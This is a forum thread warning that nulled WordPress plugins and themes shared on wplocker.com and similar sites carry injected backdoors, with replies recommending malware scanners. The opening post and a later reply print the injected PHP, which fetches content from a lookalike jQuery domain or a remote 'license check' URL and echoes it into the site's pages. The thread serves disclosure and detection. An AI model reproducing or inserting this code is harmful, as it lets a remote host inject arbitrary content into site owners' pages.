WPLOCKER.COM EXPOSED Infected Themes and Scripts

***enmedallo*** · (This post was last modified: 06-15-2013 12:31 PM by enmedallo.)

I've been running some files comparisions lately between wp plugins shared on some sites specially WPLOCKER.COM and the same plugins bought by me personally [clean and ethic code from the authors themselves].

We all know wplocker.com because they like to put the phrase "Shared On WPLOCKER.COM" all over the code, nagging our workflow with the plugins. But that is nothing compared to other code these guys like to add to the script.

I have used the software Winmerge so I can compare 2 unzipped folders and detect easily the changes made. The malicious code added changes from season to season, I guess, to make difficult to find the malicious code for someone aware about this. The code I've found is this:

Code:

function wp__head() { if(function_exists('curl_init')) {   $ch = curl_init();  curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");   curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);   curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);  curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);   $jquery = curl_exec($ch);    curl_close($ch);   echo "$jquery"; }

If you are clever enough, the first thing you'll notice, is of course, the misspelling in the JQuery site, is written 'jqury.net'. So, maybe someone reading the code to find it, will let it pass. Sometimes, the 'extra malicious' code, will break the plugin, making it unusable (something good, at least is a sign of something going wrong!), but all the time, this code will run inside your wp plugin installation process and execute who know what...

Quote: I PROPOSE TO UPDATE THIS THREAD, WITH THE MISSPELLED STRINGS OR KEYWORDS YOU FIND, TO SCAN THE DOWNLOADED FILES, AND BE A LITTLE MORE CLOSE TO AT LEAST KNOW, THE FILES WE DOWNLOAD ARE FREE OF MALICIOUS CODE AND DENOUNCE THOSE SITES WHO SHARE THIS FILES TO BE MORE ALERT NEXT TIME WE GOOGLE FOR A PLUGIN OR THEME AND WE FIND THEM "NULLED"

PLEASE READ THE NEXT POST TO KNOW MORE ABOUT INFECTED PLUGINS AND THEMES:
http://bestblackhatforum.com/Thread-Be-C...INS-THEMES

This thread contains a POLL so you can tell if you have been affected by infected shared plugins and themes.

***7digits*** · 06-15-2013, 12:47 PM

Nice share

***StevieRay*** · 06-15-2013, 02:51 PM

WHAT WE NEED IS A BOT THAT SCANS THEMES! AFTER SCANNING! INSTALL!

***rumatrix*** · 03-24-2014, 08:44 AM

Try this http://wordpress.org/plugins/tac/

***bimple*** · 03-24-2014, 12:07 PM

http://wordpress.org/plugins/gotmls/

***bimple*** · 03-24-2014, 10:58 PM

Apart from Official WordPress repository there are hundreds and thousands of websites which provides free WordPress themes and Plugins but the problem is you can not trust them always. Yes, Most of them add a malicious code to themes and plugins which is not too easy for you to find out.Before learning about the cure lets discuss about the cause.

Here is why they add their custom codes

To get backlink from your blog unknowingly
To get access to your blog
To redirect your blog to spam links
To add their advertisements and banners.
or to simply get your website down

Not only free themes and plugins also the premium nulled plugins and themes that you have download from DOWNLOAD and torrents may also infected by these malicious codes.

Detecting Malicious codes
After downloading the plugin or theme,The first thing you should do is to check for virus,trojans and other worms that you may not like it.
Check for Virus and Trojans
Go to VirusTotal.com and upload the zip file to check for virus.
If your file is infected you will get a red signal and if not then you can move on to next step.

VirusTotal Scan result
Check for unwanted codes in Plugins
Now lets check for unwanted codes in plugins using another WordPress plugin called Exploit Scanner,which can be securely downloaded from WordPress website.
After installing it go to Dashboard >> Tools >> Exploit Scanner and run the scan.It will take some time to complete the scan and the time depends on number of plugins you have installed.
After the scan you can see a list of codes that are suspected.You can use the browser search function to find the plugins that you installed from outside WordPress repository.

Exploit Scanner
Note : This plugin will also scan themes but you might to be interested to try the tip that I am about to give next.

Check for Theme authenticity
Adding a backlink in a free theme is very common technique but you can easily find those exploited themes by the plugin called Theme Authenticity Checker (TAC).

Install the plugin and go to Dashboard >> Appearance >> TAC

You can see the list of themes installed with their authenticity result.It will give a warning if any encrypted links are found in a theme.

[Image: TAC.jpg]

***Smosh*** · (This post was last modified: 03-25-2014 01:30 AM by Smosh.)

Just checked my website after reading this post at it had been hacked three times before. I found exploits in most of the plugins and themes and even those which were downloaded from other websites including this.

Found this on a script from i2share

<?php
$tmp = @file_get_contents('http://www.i2share.com/license_check.php?key=' . urlencode($key));
echo $tmp;
?>

***wprocker*** · (This post was last modified: 03-25-2014 02:21 AM by wprocker.)

nice share!
I have downloaded several theme from there, I need to check for this

Thanks

Poll: Have you ever been affected by a infected shared script or theme?
	Yes, and I will be more alert
	Nope, and I will be more alert